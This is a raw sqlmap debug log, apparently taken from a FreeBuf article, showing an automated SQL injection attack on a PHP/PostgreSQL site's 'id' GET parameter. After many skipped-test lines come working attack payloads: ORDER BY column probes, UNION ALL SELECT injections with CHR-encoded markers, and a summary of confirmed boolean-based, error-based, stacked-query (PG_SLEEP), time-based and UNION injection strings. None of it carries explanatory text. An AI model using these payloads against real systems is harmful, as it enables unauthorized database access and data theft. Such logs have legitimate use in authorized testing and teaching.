[00:13:42] [DEBUG] skipping test 'MySQL <= 5.0.11 OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL <= 5.0.11 AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL <= 5.0.11 OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0.12 RLIKE time-based blind' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0.12 RLIKE time-based blind (comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL AND time-based blind (ELT)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL OR time-based blind (ELT)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL AND time-based blind (ELT - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL OR time-based blind (ELT - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase time-based blind (IF)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase time-based blind (IF - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle AND time-based blind' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle OR time-based blind' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle AND time-based blind (comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle OR time-based blind (comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'IBM DB2 AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'IBM DB2 OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'IBM DB2 AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'IBM DB2 OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'SQLite > 2.0 AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'SQLite > 2.0 OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'SQLite > 2.0 AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'SQLite > 2.0 OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Firebird >= 2.0 AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Firebird >= 2.0 OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Firebird >= 2.0 AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Firebird >= 2.0 OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'SAP MaxDB AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'SAP MaxDB OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'SAP MaxDB AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'SAP MaxDB OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB >= 1.7.2 AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB >= 1.7.2 OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB >= 1.7.2 AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB >= 1.7.2 OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB > 2.0 AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB > 2.0 OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB > 2.0 AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB > 2.0 OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Informix AND time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Informix OR time-based blind (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Informix AND time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Informix OR time-based blind (heavy query - comment)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0.12 time-based blind - Parameter replace' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL <= 5.0.11 time-based blind - Parameter replace (heavy queries)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL time-based blind - Parameter replace (bool)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL time-based blind - Parameter replace (ELT)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL time-based blind - Parameter replace (MAKE_SET)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle time-based blind - Parameter replace (heavy queries)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'SQLite > 2.0 time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Firebird time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'SAP MaxDB time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'IBM DB2 time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB >= 1.7.2 time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB > 2.0 time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Informix time-based blind - Parameter replace (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'MySQL <= 5.0.11 time-based blind - ORDER BY, GROUP BY clause (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'Oracle time-based blind - ORDER BY, GROUP BY clause (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB >= 1.7.2 time-based blind - ORDER BY, GROUP BY clause (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [DEBUG] skipping test 'HSQLDB > 2.0 time-based blind - ORDER BY, GROUP BY clause (heavy query)' because the payload for time-based blind has already been identified
[00:13:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[00:13:42] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[00:13:42] [PAYLOAD] 1 ORDER BY 1-- ukrS
[00:13:42] [PAYLOAD] 1 ORDER BY 9562-- Pqqc
[00:13:43] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[00:13:43] [PAYLOAD] 1 ORDER BY 10-- zBVe
[00:13:43] [PAYLOAD] 1 ORDER BY 6-- hvQT
[00:13:43] [PAYLOAD] 1 ORDER BY 4-- ePmH
[00:13:43] [PAYLOAD] 1 ORDER BY 5-- dwXY
[00:13:43] [INFO] target URL appears to have 4 columns in query
[00:13:43] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,(CHR(113)||CHR(118)||CHR(122)||CHR(106)||CHR(113))||(CHR(98)||CHR(83)||CHR(68)||CHR(80)||CHR(101)||CHR(117)||CHR(69)||CHR(84)||CHR(73)||CHR(67)||CHR(71)||CHR(122)||CHR(104)||CHR(86)||CHR(68)||CHR(73)||CHR(67)||CHR(88)||CHR(122)||CHR(75)||CHR(77)||CHR(78)||CHR(65)||CHR(120)||CHR(81)||CHR(102)||CHR(99)||CHR(66)||CHR(110)||CHR(65)||CHR(88)||CHR(116)||CHR(75)||CHR(74)||CHR(103)||CHR(100)||CHR(100)||CHR(90)||CHR(82)||CHR(85))||(CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113)),NULL-- QaoY
[00:13:43] [PAYLOAD] 1 UNION ALL SELECT (CHR(113)||CHR(118)||CHR(122)||CHR(106)||CHR(113))||(CHR(70)||CHR(121)||CHR(107)||CHR(107)||CHR(119)||CHR(90)||CHR(65)||CHR(111)||CHR(75)||CHR(100)||CHR(84)||CHR(106)||CHR(68)||CHR(97)||CHR(81)||CHR(72)||CHR(121)||CHR(113)||CHR(98)||CHR(107)||CHR(70)||CHR(81)||CHR(71)||CHR(111)||CHR(106)||CHR(72)||CHR(84)||CHR(90)||CHR(71)||CHR(77)||CHR(117)||CHR(118)||CHR(115)||CHR(72)||CHR(79)||CHR(72)||CHR(77)||CHR(108)||CHR(120)||CHR(83))||(CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113)),NULL,NULL,NULL-- fEEy
[00:13:43] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,NULL,(CHR(113)||CHR(118)||CHR(122)||CHR(106)||CHR(113))||(CHR(81)||CHR(110)||CHR(118)||CHR(72)||CHR(115)||CHR(107)||CHR(111)||CHR(88)||CHR(66)||CHR(86)||CHR(79)||CHR(104)||CHR(98)||CHR(78)||CHR(68)||CHR(107)||CHR(79)||CHR(79)||CHR(103)||CHR(86)||CHR(102)||CHR(68)||CHR(115)||CHR(98)||CHR(80)||CHR(99)||CHR(104)||CHR(122)||CHR(114)||CHR(103)||CHR(70)||CHR(114)||CHR(98)||CHR(112)||CHR(72)||CHR(79)||CHR(76)||CHR(97)||CHR(81)||CHR(87))||(CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113))-- HcGU
[00:13:43] [PAYLOAD] 1 UNION ALL SELECT NULL,(CHR(113)||CHR(118)||CHR(122)||CHR(106)||CHR(113))||(CHR(109)||CHR(102)||CHR(78)||CHR(84)||CHR(117)||CHR(112)||CHR(98)||CHR(120)||CHR(89)||CHR(84)||CHR(112)||CHR(72)||CHR(120)||CHR(102)||CHR(106)||CHR(85)||CHR(118)||CHR(89)||CHR(83)||CHR(101)||CHR(81)||CHR(68)||CHR(110)||CHR(104)||CHR(120)||CHR(109)||CHR(90)||CHR(82)||CHR(120)||CHR(109)||CHR(108)||CHR(80)||CHR(68)||CHR(74)||CHR(84)||CHR(103)||CHR(82)||CHR(85)||CHR(87)||CHR(121))||(CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113)),NULL,NULL-- aLXg
[00:13:43] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,(CHR(113)||CHR(118)||CHR(122)||CHR(106)||CHR(113))||(CHR(74)||CHR(108)||CHR(84)||CHR(86)||CHR(121)||CHR(105)||CHR(68)||CHR(90)||CHR(79)||CHR(78))||(CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113)),NULL-- VYJL
[00:13:43] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,(CHR(113)||CHR(118)||CHR(122)||CHR(106)||CHR(113))||(CHR(74)||CHR(108)||CHR(84)||CHR(86)||CHR(121)||CHR(105)||CHR(68)||CHR(90)||CHR(79)||CHR(78))||(CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113)),NULL UNION ALL SELECT NULL,NULL,(CHR(113)||CHR(118)||CHR(122)||CHR(106)||CHR(113))||(CHR(86)||CHR(103)||CHR(77)||CHR(106)||CHR(70)||CHR(116)||CHR(122)||CHR(72)||CHR(72)||CHR(105))||(CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113)),NULL-- GScf
[00:13:43] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,(CHR(113)||CHR(118)||CHR(122)||CHR(106)||CHR(113))||(CHR(74)||CHR(108)||CHR(84)||CHR(86)||CHR(121)||CHR(105)||CHR(68)||CHR(90)||CHR(79)||CHR(78))||(CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113)),NULL FROM (SELECT 0 AS Yfmw UNION SELECT 1 UNION SELECT 2 UNION SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6 UNION SELECT 7 UNION SELECT 8 UNION SELECT 9 UNION SELECT 10 UNION SELECT 11 UNION SELECT 12 UNION SELECT 13 UNION SELECT 14) AS jKrK-- AKZx
[00:13:43] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[00:13:43] [DEBUG] skipping test 'Generic UNION query (random number) - 1 to 20 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 21 to 40 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'Generic UNION query (random number) - 21 to 40 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 41 to 60 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'Generic UNION query (random number) - 41 to 60 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 61 to 80 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'Generic UNION query (random number) - 61 to 80 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'Generic UNION query (NULL) - 81 to 100 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'Generic UNION query (random number) - 81 to 100 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'MySQL UNION query (NULL) - 1 to 20 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'MySQL UNION query (random number) - 1 to 20 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'MySQL UNION query (NULL) - 21 to 40 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'MySQL UNION query (random number) - 21 to 40 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'MySQL UNION query (NULL) - 41 to 60 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'MySQL UNION query (random number) - 41 to 60 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'MySQL UNION query (NULL) - 61 to 80 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'MySQL UNION query (random number) - 61 to 80 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'MySQL UNION query (NULL) - 81 to 100 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] skipping test 'MySQL UNION query (random number) - 81 to 100 columns' because the payload for UNION query has already been identified
[00:13:43] [DEBUG] checking for parameter length constraining mechanisms
[00:13:43] [PAYLOAD] 1 UNION ALL SELECT NULL,NULL,(CHR(113)||CHR(118)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (7910=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                7910) THEN (CHR(49)) ELSE (CHR(48)) END))||(CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113)),NULL-- ePVz
[00:13:43] [DEBUG] performed 1 queries in 0.04 seconds
[00:13:43] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
[00:13:43] [DEBUG] checking for filtered characters
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
[00:13:43] [DEBUG] used the default behavior, running in batch mode
sqlmap identified the following injection point(s) with a total of 48 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1338=1338
    Vector: AND [INFERENCE]

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: id=1 AND 7925=CAST((CHR(113)||CHR(118)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (7925=7925) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113)) AS NUMERIC)
    Vector: AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: id=1;SELECT PG_SLEEP(5)--
    Vector: ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)--

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: id=1 AND 4944=(SELECT 4944 FROM PG_SLEEP(5))
    Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,(CHR(113)||CHR(118)||CHR(122)||CHR(106)||CHR(113))||(CHR(74)||CHR(108)||CHR(84)||CHR(86)||CHR(121)||CHR(105)||CHR(68)||CHR(90)||CHR(79)||CHR(78))||(CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113)),NULL-- VYJL
    Vector:  UNION ALL SELECT NULL,NULL,[QUERY],NULL[GENERIC_SQL_COMMENT]
---
[00:13:43] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: PostgreSQL

来源:freebuf.com 2019-08-20 12:14:30 by: 陌度

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论